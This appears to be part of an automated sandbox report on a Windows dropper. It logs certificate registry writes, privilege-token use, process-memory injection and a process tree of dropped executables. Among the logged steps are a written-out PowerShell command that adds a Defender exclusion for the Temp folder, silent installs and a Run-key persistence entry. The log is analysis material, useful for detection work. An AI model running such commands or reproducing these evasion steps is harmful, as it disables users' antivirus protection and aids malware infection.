8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 5c000000010000000400000000080000190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc36200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	installer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2472	WerFault.exe
2472	WerFault.exe
2416	WerFault.exe
2416	WerFault.exe
476	powershell.exe
476	powershell.exe
2384	WerFault.exe
2384	WerFault.exe
5128	WerFault.exe
5128	WerFault.exe
2904	rundll32.exe
2904	rundll32.exe
476	powershell.exe
476	powershell.exe
5664	WerFault.exe
5664	WerFault.exe
5536	setup_2.tmp
5536	setup_2.tmp
5824	WerFault.exe
5824	WerFault.exe
3800	3155661.exe
3800	3155661.exe
5268	7570742.exe
5268	7570742.exe
5524	4089607.exe
5524	4089607.exe
5196	WerFault.exe
5196	WerFault.exe
344	sNOldKfrjNE4mmfOTLZWB4RK.exe
344	sNOldKfrjNE4mmfOTLZWB4RK.exe
1732	WerFault.exe
1732	WerFault.exe
5336	ultramediaburner.tmp
5336	ultramediaburner.tmp
1692	WerFault.exe
1692	WerFault.exe
4452	1018857.exe
4452	1018857.exe
1212	WerFault.exe
1212	WerFault.exe
452	4132860.exe
452	4132860.exe
6052	5lf4wMbH4mC3Lxf2JAoQ37rC.exe
6052	5lf4wMbH4mC3Lxf2JAoQ37rC.exe
5552	Xydisagavi.exe
5552	Xydisagavi.exe
5552	Xydisagavi.exe
5552	Xydisagavi.exe
5552	Xydisagavi.exe
5552	Xydisagavi.exe
5552	Xydisagavi.exe
5552	Xydisagavi.exe
5552	Xydisagavi.exe
5552	Xydisagavi.exe
5552	Xydisagavi.exe
5552	Xydisagavi.exe
5552	Xydisagavi.exe
5552	Xydisagavi.exe
5552	Xydisagavi.exe
5552	Xydisagavi.exe
5552	Xydisagavi.exe
5552	Xydisagavi.exe
5552	Xydisagavi.exe
5552	Xydisagavi.exe

Suspicious behavior: SetClipboardViewer 1 IoCs

pid	Process
5888	WinHoster.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3232	Fri155442fc38b.exe
Token: SeDebugPrivilege	1164	Fri1553f0ee90.exe
Token: SeRestorePrivilege	2416	WerFault.exe
Token: SeBackupPrivilege	2416	WerFault.exe
Token: SeBackupPrivilege	2416	WerFault.exe
Token: SeDebugPrivilege	476	powershell.exe
Token: SeDebugPrivilege	3800	3155661.exe
Token: SeDebugPrivilege	1164	2.exe
Token: SeDebugPrivilege	4460	PublicDwlBrowser1100.exe
Token: SeDebugPrivilege	5192	BearVpn 3.exe
Token: SeDebugPrivilege	5524	4089607.exe
Token: SeDebugPrivilege	5268	7570742.exe
Token: SeDebugPrivilege	1732	3069781.exe
Token: SeDebugPrivilege	3184	zab2our.exe
Token: SeDebugPrivilege	452	4132860.exe
Token: SeDebugPrivilege	4452	1018857.exe
Token: SeIncreaseQuotaPrivilege	476	powershell.exe
Token: SeSecurityPrivilege	476	powershell.exe
Token: SeTakeOwnershipPrivilege	476	powershell.exe
Token: SeLoadDriverPrivilege	476	powershell.exe
Token: SeSystemProfilePrivilege	476	powershell.exe
Token: SeSystemtimePrivilege	476	powershell.exe
Token: SeProfSingleProcessPrivilege	476	powershell.exe
Token: SeIncBasePriorityPrivilege	476	powershell.exe
Token: SeCreatePagefilePrivilege	476	powershell.exe
Token: SeBackupPrivilege	476	powershell.exe
Token: SeRestorePrivilege	476	powershell.exe
Token: SeShutdownPrivilege	476	powershell.exe
Token: SeDebugPrivilege	476	powershell.exe
Token: SeSystemEnvironmentPrivilege	476	powershell.exe
Token: SeRemoteShutdownPrivilege	476	powershell.exe
Token: SeUndockPrivilege	476	powershell.exe
Token: SeManageVolumePrivilege	476	powershell.exe
Token: 33	476	powershell.exe
Token: 34	476	powershell.exe
Token: 35	476	powershell.exe
Token: 36	476	powershell.exe
Token: SeDebugPrivilege	5724	5486143.exe
Token: SeDebugPrivilege	6052	5lf4wMbH4mC3Lxf2JAoQ37rC.exe
Token: SeDebugPrivilege	5552	Xydisagavi.exe
Token: SeDebugPrivilege	4000	Gizhushadugu.exe
Token: SeDebugPrivilege	3964	Chrome 5.exe
Token: SeSecurityPrivilege	1660	msiexec.exe
Token: SeCreateTokenPrivilege	4356	installer.exe
Token: SeAssignPrimaryTokenPrivilege	4356	installer.exe
Token: SeLockMemoryPrivilege	4356	installer.exe
Token: SeIncreaseQuotaPrivilege	4356	installer.exe
Token: SeMachineAccountPrivilege	4356	installer.exe
Token: SeTcbPrivilege	4356	installer.exe
Token: SeSecurityPrivilege	4356	installer.exe
Token: SeTakeOwnershipPrivilege	4356	installer.exe
Token: SeLoadDriverPrivilege	4356	installer.exe
Token: SeSystemProfilePrivilege	4356	installer.exe
Token: SeSystemtimePrivilege	4356	installer.exe
Token: SeProfSingleProcessPrivilege	4356	installer.exe
Token: SeIncBasePriorityPrivilege	4356	installer.exe
Token: SeCreatePagefilePrivilege	4356	installer.exe
Token: SeCreatePermanentPrivilege	4356	installer.exe
Token: SeBackupPrivilege	4356	installer.exe
Token: SeRestorePrivilege	4356	installer.exe
Token: SeShutdownPrivilege	4356	installer.exe
Token: SeDebugPrivilege	4356	installer.exe
Token: SeAuditPrivilege	4356	installer.exe
Token: SeSystemEnvironmentPrivilege	4356	installer.exe

Suspicious use of FindShellTrayWindow 4 IoCs

pid	Process
5536	setup_2.tmp
5336	ultramediaburner.tmp
4356	installer.exe
5768	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2340 wrote to memory of 3828	2340	setup_x86_x64_install.exe	77
PID 2340 wrote to memory of 3828	2340	setup_x86_x64_install.exe	77
PID 2340 wrote to memory of 3828	2340	setup_x86_x64_install.exe	77
PID 3828 wrote to memory of 4152	3828	setup_installer.exe	78
PID 3828 wrote to memory of 4152	3828	setup_installer.exe	78
PID 3828 wrote to memory of 4152	3828	setup_installer.exe	78
PID 4152 wrote to memory of 4804	4152	setup_install.exe	84
PID 4152 wrote to memory of 4804	4152	setup_install.exe	84
PID 4152 wrote to memory of 4804	4152	setup_install.exe	84
PID 4152 wrote to memory of 4856	4152	setup_install.exe	85
PID 4152 wrote to memory of 4856	4152	setup_install.exe	85
PID 4152 wrote to memory of 4856	4152	setup_install.exe	85
PID 4152 wrote to memory of 2140	4152	setup_install.exe	86
PID 4152 wrote to memory of 2140	4152	setup_install.exe	86
PID 4152 wrote to memory of 2140	4152	setup_install.exe	86
PID 4152 wrote to memory of 4360	4152	setup_install.exe	87
PID 4152 wrote to memory of 4360	4152	setup_install.exe	87
PID 4152 wrote to memory of 4360	4152	setup_install.exe	87
PID 4152 wrote to memory of 4920	4152	setup_install.exe	88
PID 4152 wrote to memory of 4920	4152	setup_install.exe	88
PID 4152 wrote to memory of 4920	4152	setup_install.exe	88
PID 4152 wrote to memory of 4784	4152	setup_install.exe	89
PID 4152 wrote to memory of 4784	4152	setup_install.exe	89
PID 4152 wrote to memory of 4784	4152	setup_install.exe	89
PID 4152 wrote to memory of 5060	4152	setup_install.exe	96
PID 4152 wrote to memory of 5060	4152	setup_install.exe	96
PID 4152 wrote to memory of 5060	4152	setup_install.exe	96
PID 4152 wrote to memory of 4456	4152	setup_install.exe	90
PID 4152 wrote to memory of 4456	4152	setup_install.exe	90
PID 4152 wrote to memory of 4456	4152	setup_install.exe	90
PID 2140 wrote to memory of 3780	2140	cmd.exe	91
PID 2140 wrote to memory of 3780	2140	cmd.exe	91
PID 2140 wrote to memory of 3780	2140	cmd.exe	91
PID 4804 wrote to memory of 476	4804	cmd.exe	92
PID 4804 wrote to memory of 476	4804	cmd.exe	92
PID 4804 wrote to memory of 476	4804	cmd.exe	92
PID 4856 wrote to memory of 2340	4856	cmd.exe	95
PID 4856 wrote to memory of 2340	4856	cmd.exe	95
PID 4856 wrote to memory of 2340	4856	cmd.exe	95
PID 4360 wrote to memory of 3768	4360	cmd.exe	94
PID 4360 wrote to memory of 3768	4360	cmd.exe	94
PID 4360 wrote to memory of 3768	4360	cmd.exe	94
PID 4920 wrote to memory of 3232	4920	cmd.exe	93
PID 4920 wrote to memory of 3232	4920	cmd.exe	93
PID 4784 wrote to memory of 4188	4784	cmd.exe	97
PID 4784 wrote to memory of 4188	4784	cmd.exe	97
PID 4784 wrote to memory of 4188	4784	cmd.exe	97
PID 3768 wrote to memory of 1124	3768	Fri157e25afd971.exe	99
PID 3768 wrote to memory of 1124	3768	Fri157e25afd971.exe	99
PID 3768 wrote to memory of 1124	3768	Fri157e25afd971.exe	99
PID 4456 wrote to memory of 1164	4456	cmd.exe	98
PID 4456 wrote to memory of 1164	4456	cmd.exe	98
PID 1252 wrote to memory of 2340	1252	WerFault.exe	95
PID 1252 wrote to memory of 2340	1252	WerFault.exe	95
PID 1180 wrote to memory of 4188	1180	WerFault.exe	97
PID 1180 wrote to memory of 4188	1180	WerFault.exe	97
PID 1124 wrote to memory of 3184	1124	Fri157e25afd971.tmp	106
PID 1124 wrote to memory of 3184	1124	Fri157e25afd971.tmp	106
PID 1164 wrote to memory of 3584	1164	Fri1553f0ee90.exe	107
PID 1164 wrote to memory of 3584	1164	Fri1553f0ee90.exe	107
PID 1164 wrote to memory of 3584	1164	Fri1553f0ee90.exe	107
PID 3232 wrote to memory of 3800	3232	Fri155442fc38b.exe	108
PID 3232 wrote to memory of 3800	3232	Fri155442fc38b.exe	108
PID 3232 wrote to memory of 4860	3232	Fri155442fc38b.exe	109

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2340
- C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3828
- - C:\Users\Admin\AppData\Local\Temp\7zS4FE09193\setup_install.exe
    "C:\Users\Admin\AppData\Local\Temp\7zS4FE09193\setup_install.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:4152
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4804
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:476
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri1544861ac3fe6a.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4856
    - - C:\Users\Admin\AppData\Local\Temp\7zS4FE09193\Fri1544861ac3fe6a.exe
        
        Fri1544861ac3fe6a.exe
        5⤵
        Executes dropped EXE
        
        PID:2340
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2340 -s 280
        6⤵
        Drops file in Windows directory
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2416
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri156ec98815f89c.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2140
    - - C:\Users\Admin\AppData\Local\Temp\7zS4FE09193\Fri156ec98815f89c.exe
        
        Fri156ec98815f89c.exe
        5⤵
        Executes dropped EXE
        
        PID:3780
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri157e25afd971.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4360
    - - C:\Users\Admin\AppData\Local\Temp\7zS4FE09193\Fri157e25afd971.exe
        
        Fri157e25afd971.exe
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3768
      - C:\Users\Admin\AppData\Local\Temp\is-JTQRM.tmp\Fri157e25afd971.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-JTQRM.tmp\Fri157e25afd971.tmp" /SL5="$601F6,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS4FE09193\Fri157e25afd971.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:1124
        
        C:\Users\Admin\AppData\Local\Temp\is-1EJFG.tmp\zab2our.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-1EJFG.tmp\zab2our.exe" /S /UID=burnerch2
        7⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Adds Run key to start application
        Drops file in Program Files directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:3184
        
        C:\Program Files\Windows Photo Viewer\KMHPCXRQCF\ultramediaburner.exe
        
        "C:\Program Files\Windows Photo Viewer\KMHPCXRQCF\ultramediaburner.exe" /VERYSILENT
        8⤵
        Executes dropped EXE
        
        PID:420
        
        C:\Users\Admin\AppData\Local\Temp\is-LACPM.tmp\ultramediaburner.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-LACPM.tmp\ultramediaburner.tmp" /SL5="$50210,281924,62464,C:\Program Files\Windows Photo Viewer\KMHPCXRQCF\ultramediaburner.exe" /VERYSILENT
        9⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        
        PID:5336
        
        C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
        
        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
        10⤵
        Executes dropped EXE
        
        PID:668
        
        C:\Users\Admin\AppData\Local\Temp\a4-df588-779-300b4-a22cd99945b46\Gizhushadugu.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a4-df588-779-300b4-a22cd99945b46\Gizhushadugu.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4000
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
        9⤵
        Suspicious use of FindShellTrayWindow
        
        PID:5768
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff864dd46f8,0x7ff864dd4708,0x7ff864dd4718
        10⤵
        
        PID:6064
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,15522794795659855686,15907120105591480214,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2112 /prefetch:2
        10⤵
        
        PID:4520
        
